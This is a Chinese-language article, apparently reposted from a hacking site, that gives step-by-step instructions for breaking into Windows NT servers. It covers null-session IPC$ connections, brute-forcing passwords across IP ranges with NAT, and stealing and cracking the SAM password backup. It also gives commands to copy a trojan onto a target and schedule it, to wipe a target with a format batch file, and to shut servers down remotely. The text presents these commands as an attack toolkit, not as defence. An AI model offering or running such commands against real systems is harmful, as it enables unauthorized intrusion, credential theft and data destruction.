转自:[url]http://www.juntuan.net[/url]

  大致说来,***Windows NT的原理和***Win95/98差不多, 因为NT同样是使用NetBIOS Over TCP/IP ( NBT )的技术, 而且应用范围比Win95/98 更广泛。以下是几种******Windows NT的方法, 让我们也窥探一下***的“武器库”吧。

  方法一、 使用空密码连线

  现在假设目标电脑的IP地址是202.64.161.X (X为任选数字), 先使用nbtstat 指令查看对方NT的网络数据:

  nbtstat -A 202.64.161.X

  如果看到<20 的字样, 那么此NT系统可能将自己电脑数据共享出来。其实在NT安装后, 会将电脑上的驱动器都共享出来, 没错, 是自动共享出来的! 不过只是隐藏了, 所以你未必会看得见。而很多人在安装好NT后未做任何设置便即使用, 这正好给***一个***的大好机会。随后***就会使用Net View 指令看看这个IP 地址:

  net view \\202.64.161.X

  正常来说会出现系统发生 System error 5 has occurred 的字样。这就是NT比Win95/98 安全的地方! 如果是Win95/98 , 只要使用net view 指令就可以看到对方电脑所有共享出来的资源, 如果是NT就一定要登录进入NT服务器才可以用net view 指令。但***并没有对NT服务器的帐户, 又怎样登录呢? 其实NT有一个很大的漏洞, 它有一个ipc$( Inter-Process Communication: 进程间通讯 ) , 其同样是隐藏共享, 作为服务器与服务器间的沟通, 只要连接到对方的IPC, 便有机会***了。他会先用null password ( 空密码, 即是没有密码! ) 来试试, 手法如下:

  net use \\202.64.161.X\ipc$ “ ” /use:“ ”

  以上的“ ” 是空密码的意思, 如果连接上会看见“指令执行成功”的字样。接着便再用

  net view \\202.64.161.X

  然后便可以看到对方所有共享出来的资源了。

  接着***会用net use 指令, 把对方共享出来的资源映射成自己的网络驱动器, 之后想怎样用就随心所欲了。如果对方没有把隐藏共享取消, ***可以用以下指令:

  net use X: \\ip地址\c$

  那对方的C 盘便会变成自己的X 盘了, 不过这方法未必一定可行, 因为NT服务器安装了Services Pack 3 或以上版本, 用空密码连接IPC$ 的权限被限制, 不能够映射NT上的驱动器 , 这时便要使用下一个方法。

  方法二、使用NAT工具

  如果用空密码进入NT服务器没有收获, ***们也不会绝望。***可以尝试使用其他帐户的密码来进入。如何知道NT服务器的帐户? 那当然是猜啦! 其实NT的密码不是想像中困难, 而是比想像中更易, 而这些大多是人为的错误。

  首先需要一个NAT的程序, NAT全名是( NetBIOS Auditing Tool ) , 可以自动连线到NT服务器, 并猜对方帐户的密码, 这是Internet上******NT的必备“武器”。

  Essential NetTools 是一个专门检查NT漏洞的NAT 套餐, 它的功能非常强劲, 先来看看它的几个主要功能。

  1. NB扫描

  NB扫描 可以一次性替你扫描 Internet 上电脑的IP, 如果你上网的速度够快, 不用一分钟便可以扫描 整个Class C 的IP , 之后它会列出那一段IP地址内所有电脑的NetBIOS数据, 作用和***用nbtstat指令一样, 不同的地方就是不用逐一测试, 节省不少时间。

  2. NATShell

  NATShell 是用暴力破解的方法尝试登录入NT服务器, 只要把目标的IP 地址输入NATShell 的视窗, 便可以开始了。可能你以为“强攻”会很难, 但根据经验, 有4成以上的NT都可以轻易攻入, 什么原因呢? 因为人懒之故。

  3.LMHosts

  用NB扫描到目标后, 可以选“Add all items to LMhosts ”项, 便会将对方的IP 及电脑名称自动加在电脑的lmhosts文档内, 以后你可以用“查找”→“电脑”, 找到对方的电脑, 非常方便。

  好了! 决定了要检查的目标后, 在NATShell填上它的IP 地址, 等待一段时间, 便可以看看结果-- NATShell的报告。

  NATShell 会不断用不同的用户名 (userlist.txt) 及密码 (passlist.txt) 来登录进入NT服务器( 当然你可以自己再编辑这两个文件) 。如果成功连接, 便会有红色的warning 字句出现, 并且列出该NT系统 的用户名 和密码 。

  例如找到NT的Administrator(管理员)的密码是admin 。便会尝试在DOS下打:

  net use x: \\IP 地址\c$ /user:administrator admin

  便成功地把此NT系统隐藏的C区映射成自己电脑的某个盘了!

  如果在NATShell 的报告是所有的共享都有"c onNECTED with name: *SMBSERVER" 的字样, 即是说NT连密码都没有设定, 如果是密码, 还要打入:

  net use x: \\IP 地址\c$ /user:administrator

  便可以把NT的C 驱动器映射成自己的某个磁盘了。如果被***知道了管理员的帐户, 基本上***以后出入如走平地, 整台NT都会被***操控。

  NAT 批量扫描法:

  因为Essential NetTools 每次只可以扫描一台NT的密码漏洞, 效率实在太低了。为了使***更有效率, ***可以使用NAT的批量扫描法。

  在Essential NetTools 的目录下有一个nat.exe 的文件, 是可以直接在DOS 状态下执行, 方法是:

  nat -o result.tst -u userlist.txt -p passlist.txt 202.64.161.1-202.64.161.254

  那么nat 程序便会根据用户名称文文档( userlist.txt ) 和密码文档( passlist.txt ) 来登录进入202.64.161.1 到202.64.161.254 的主机范围, 并会将结果存在result.txt 上。

  方法三、 检查NT的密码

  用Essential NetTools 可以用不同的户名称及密码文档来登录进入NT服务器, 如果直接得到管理员的帐户, 就证明这台NT服务器的安全程度低得可怜!

  如果只是得到一般的帐户的密码, 虽然权力不大, 但也不代表这部NT是安全。例如***可以用一般帐户的密码登录进入NT服务器, 然后用Copy 指令, 将NT的密码文档拷到自己的电脑中。

  不过NT的密码文档(SAM , 文件位置在\Winnt\System32\c onfig ) 的系统启动时是只读的, 不可以复制, 不过还有另一个文件, 就是在\winnt\repair\ 的目录中的sam._ 文档。

  Sam._ 是什么文档? 通常在安装NT时都会制作系统恢复盘 , 遇到NT有问题时, 便可以用系统恢复盘 进入NT, 而sam._ 便是sam 密码文档的“副本”。只要将sam._ 拷到电脑上, 便可以用其他程序来慢慢破解密码了。在DOS 状态下执行复制:

  copy \\202.64.161.X\admin$\repair\sam._ c:\

  便会把sam._ 文档拷到自己的C 盘内。如果目标电脑忽略了sam._ 的重要性, 没有设定好文件的权限, 便为***提供了大好机会了。

  如何解开SAM 密码文档:

  NT的系统密码是用单向散列( Hash ) 来处理过, 完全看不出源密码, 理论上要还原成源密码机会不大, 这些编码会放在SAM ( Security AccouNTManager ) 数据库内, 可以用一个专门破解NT密码的程序--- L0phtCrack 来破解。

  它是Internet 上非常有名的检查NT密码工具, 它会用各种可能的密码, 反复模拟NT的编码过程, 并将编出来的密码与SAM 数据库的密码比对, 如果相同, 就会得出密码了, ***可以借此***NT的系统! 先将sam._ 用extract 指令解开, 在DOS 状态下打:

  extract sam._ sam.txt

  执行L0phtCrack , 在"File" "Import" "SAM file" 输入sam.txt ,在"Tools" "Start Crack" 便会开始解密。

  如果NT的密码是一些数字或人名, 用L0phtCrack 不用十分钟便可以解开!有人曾用一台Pentium II 的电脑, 只用一日时间便完全解开管理员和其他帐户的密码。

  但以上这些指令和工具都有限制的,就是只可以显示NT服务器的隐藏共享、已登录进入系统的用户名称,数据不够详细,以下***用的NTInfo扫描就可以进一步检查NT服务器的漏洞(也适用于Windows 2000)。

  1. 用户数据一览无遗的NTInfo扫描

  为了进一步了解目标电脑的安全性, ***需要使用一个超小型的工具NTInfo扫描 , 它只有69 KB , 但比Essential NetTools 更强劲! 只要执行它, NT服务器的隐藏共享 、用户帐户名称、域名都会一览无遗, 可以让***深入了解该台NT服务器的漏洞! 只要在DOS 状态下下执行:

  ntis -n IP地址

  之后NTInfo扫描便会列出一个详细的报告( HTML 文档) , 包括所有共享的资源( 包括了隐藏的) 、共享的名称、所有NT服务器内的帐户数据, 例如用户帐户名称、是否可以游客身份登录、多久没有更改密码等。而最强悍的地方是NTInfo扫描 ,它会自动检查NT服务器内帐户密码是否足够安全, 例如检查用户名称和密码是否一致、或者有没有使用密码等。

  2. NTResource Kit 帮助***

  如果大家的NT服务器安装了NTResource Kit 4.0 , 你会发觉这个工具非常有用。NTResource Kit 可以算是NT服务器的辅助工具, 可以帮助网络管理人员管理NT和遥控处理NT的工作。不过内里有几个程序常会被***利用来***NT的电脑。

  (1) . 共享资源的Net Watch

  如果有***使用上述介绍的方法来进入NT服务器, 便有机会为所欲为了!

  只要使用Resource Kit 的"Net Watch" 便可以连接对方的电脑。在"c onnection" / "Add Computer" 输入电脑的IP 地址, 隔一会便会出现对方电脑共享出来的资源。"Manage Shares" 会显示对方的共用目录, 只要按" 添加共享资源" 便可将对方电脑整个硬盘都共享出来, 并且将权限设为"Everyone", 这便使得日后的***更方便了。

  (2) . 监视程序的Process Viewer

  NTResource Kit 提供了Process Viewer , 它可以检视Local 和Remote 电脑直接在执行的程序。Process Viewer 可以监视NT服务器的执行情况, 如内存和各种程序的使用情况。只要在"Computer" 输入对方电脑的IP 地址, 隔一会便会显示对方NT正在执行的程序, 它可以杀死本地电脑的程序。

  ***如果要杀死远程电脑的程序也是有办法的, 只要使用一个名叫Pskiller 的小程序就可以轻易做到了! 先用Process Viewer 连接NT电脑, 知道这台电脑正在运行什么程序, 之后便可以用Pskiller 来杀死。用法很简单, 在DOS 状态下输入:

  pskill \\ 电脑名称或IP地址-u roland -p xyz

  -u roland : 是用户名称/
  -p XYZ:进程中的电脑或ID

  (3). 定时控制的netsve

  netsvc 是一个小小的程序, 可以用来启动NT的服务, 如schedule(进度表)等, 通常是***用来遥控执行NT服务器的某个程序, 先将netsvc 拷到对方的NT内:

  copy ntsvc.exe \\IP 地址\admin$\system32

  然后再输入:

  netsvc \\IP 地址schedule /start

  这便可以启动该电脑的schedule 服务。

  然后便把一个***或病毒程序( 假设是killer.exe ) 拷到对方电脑:

  copy filler.exe \\IP 地址\admin$\system32

  之后便可以用at 指令来设定schedule 的执行时间:

  at \\IP 地址12:30 killer.exe

  这样就可以在12:30 时自动执行killer.exe

  如果遇到一些“辣手”的***, 只要复合一个含有format 指令的简单批处理文件到NT服务器上, 校准时间, 便可以将对方的NT清洗得一干二净。

  (4). 关闭NT的shutdown :

  shutdown : 关了对方的NT服务器:

  Shutdown \\IP 地址t:20

  20秒后将NT自动关闭, 如果对方是大型网站可就惨了!